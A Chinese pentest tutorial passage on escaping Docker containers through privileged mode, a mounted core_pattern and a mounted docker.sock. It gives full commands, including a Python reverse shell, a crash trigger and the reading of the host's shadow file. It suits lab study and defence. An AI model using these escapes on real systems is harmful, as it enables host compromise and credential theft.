当前位置:   article > 正文

Day95:云上攻防-云原生篇&Docker安全&权限环境检测&容器逃逸&特权模式&危险挂载

Day95:云上攻防-云原生篇&Docker安全&权限环境检测&容器逃逸&特权模式&危险挂载

目录

云原生-Docker安全-容器逃逸&特权模式

云原生-Docker安全-容器逃逸&挂载Procfs

云原生-Docker安全-容器逃逸&挂载Socket

云原生-Docker安全-容器逃逸条件&权限高低

高权限-Web入口到Docker逃逸(java)特权模式逃逸

低权限-Web入口到Docker逃逸(PHP)特权模式逃逸


知识点:

1、云原生-Docker安全-容器逃逸&特权模式

2、云原生-Docker安全-容器逃逸&挂载Procfs

3、云原生-Docker安全-容器逃逸&挂载Socket

4、云原生-Docker安全-容器逃逸条件&权限高低

1、Docker是干嘛的?

一个容器技术,类似于VM虚拟机,别人环境封装好打包成一个镜像,使用docker技术就能快速把这个镜像环境还原出来。

2、Docker对于渗透测试影响?

攻击者攻击虚拟空间磁盘,拿到最高权限也是虚拟空间的权限,而不是真实物理环境的权限

3、前渗透-判断是否在容器中

前提:拿到权限

https://blog.csdn.net/qq_23936389/article/details/131486643

方式一:查询cgroup信息

最简单精准的方式就是查询系统进程的cgroup信息,通过响应的内容可以识别当前进程所处的运行环境,就可以知道是在虚拟机、docker还是kubepods里。

cat /proc/1/cgroup

docker 环境下:

K8s环境下:

方式二:检查/.dockerenv文件

通过判断根目录下的 .dockerenv文件是否存在,可以简单的识别docker环境。
K8s&docker环境下:

ls -alh /.dockerenv 

可以找到文件。

方式三:查看端口运行情况

netstat -anpt

4、后渗透-三种安全容器逃逸

  1. 特权模式启动导致(不安全启动,适用于java jsp高权限入口无需提权 低权限入口还要提权才能逃逸)
  2. 危险挂载启动导致(危险启动,适用于java jsp高权限入口无需提权 低权限入口还要提权才能逃逸)
  3. docker自身版本漏洞&系统内核漏洞(软件版本漏洞和系统漏洞 高低权限都可用)

参考地址:https://wiki.teamssix.com/CloudNative/

云原生-Docker安全-容器逃逸&特权模式

参考地址:https://wiki.teamssix.com/CloudNative/Docker/docker-privileged-escape.html

1、以特权模式启动靶场

docker run --rm --privileged=true -it alpine

2、检测是否是docker环境

cat /proc/1/cgroup | grep -qi docker && echo "Is Docker" || echo "Not Docker"

3、判断是否是特权模式

cat /proc/self/status | grep CapEff

4、查看目录

fdisk -l

5、特权模式逃逸

mkdir /test && mount /dev/sda1 /test

  1. cd /test/
  2. ls

尝试访问宿主机 shadow 文件,可以看到正常访问

云原生-Docker安全-容器逃逸&挂载Procfs

参考地址:https://wiki.teamssix.com/CloudNative/Docker/docker-procfs-escape.html

1、启动环境

docker run -it -v /proc/sys/kernel/core_pattern:/host/proc/sys/kernel/core_pattern ubuntu

2、检测环境

find / -name core_pattern

3、查找路径(容器在真实磁盘的绝对路径)

cat /proc/mounts | grep workdir

4、写入文件

  1. cat >/tmp/.x.py << EOF
  2. #!/usr/bin/python
  3. import os
  4. import pty
  5. import socket
  6. lhost = "xx.xx.xx.xx" //反弹IP
  7. lport = xxxx //反弹端口
  8. def main():
  9. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  10. s.connect((lhost, lport))
  11. os.dup2(s.fileno(), 0)
  12. os.dup2(s.fileno(), 1)
  13. os.dup2(s.fileno(), 2)
  14. os.putenv("HISTFILE", '/dev/null')
  15. pty.spawn("/bin/bash")
  16. os.remove('/tmp/.x.py')
  17. s.close()
  18. if __name__ == "__main__":
  19. main()
  20. EOF

chmod +x /tmp/.x.py

  1. echo -e "|/var/lib/docker/overlay2/4aac278b06d86b0d7b6efa4640368820c8c16f1da8662997ec1845f3cc69ccee/merged/tmp/.x.py \rcore " > /host/proc/sys/kernel/core_pattern
  2. //这里的路径要替换为workdir的绝对路径

  1. cat >/tmp/x.c << EOF
  2. #include <stdio.h>
  3. int main(void)
  4. {
  5. int *a = NULL;
  6. *a = 1;
  7. return 0;
  8. }
  9. EOF

  1. cd /tmp
  2. gcc x.c -o x //编译c文件

  1. apt-get update -y && apt-get install gcc -y
  2. //实战中不推荐安装gcc环境,可以在linux上编译好后上传到容器中执行就行

5、执行文件:

./x  

vps上监听即可

nc -lvvp xxxx

云原生-Docker安全-容器逃逸&挂载Socket

参考地址:https://wiki.teamssix.com/CloudNative/Docker/docker-socket-escape.html

1、启动靶场

docker run -itd --name with_docker_sock -v /var/run/docker.sock:/var/run/docker.sock ubuntu

2、进入环境

docker exec -it with_docker_sock /bin/bash

3、检测环境

ls -lah /var/run/docker.sock

4、挂载逃逸

  1. apt-get update
  2. apt-get install curl
  3. curl -fsSL https://get.docker.com/ | sh

在容器内部创建一个新的容器,并将宿主机目录挂载到新的容器内部

docker run -it -v /:/host ubuntu /bin/bash

ls /host/root

云原生-Docker安全-容器逃逸条件&权限高低

模拟真实场景:

高权限-Web入口到Docker逃逸(java)特权模式逃逸

docker run --rm --privileged=true -it -p 8888:8080 vulfocus/shiro-721

低权限-Web入口到Docker逃逸(PHP)特权模式逃逸

docker run --rm --privileged=true -it -p 8080:80 sagikazarmark/dvwa

入口如果是低权限的话是没法用特权模式和危险挂载去逃逸的,但是可以利用系统漏洞或者docker自身漏洞去逃逸。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/很楠不爱3/article/detail/428707
推荐阅读
相关标签
  

闽ICP备14008679号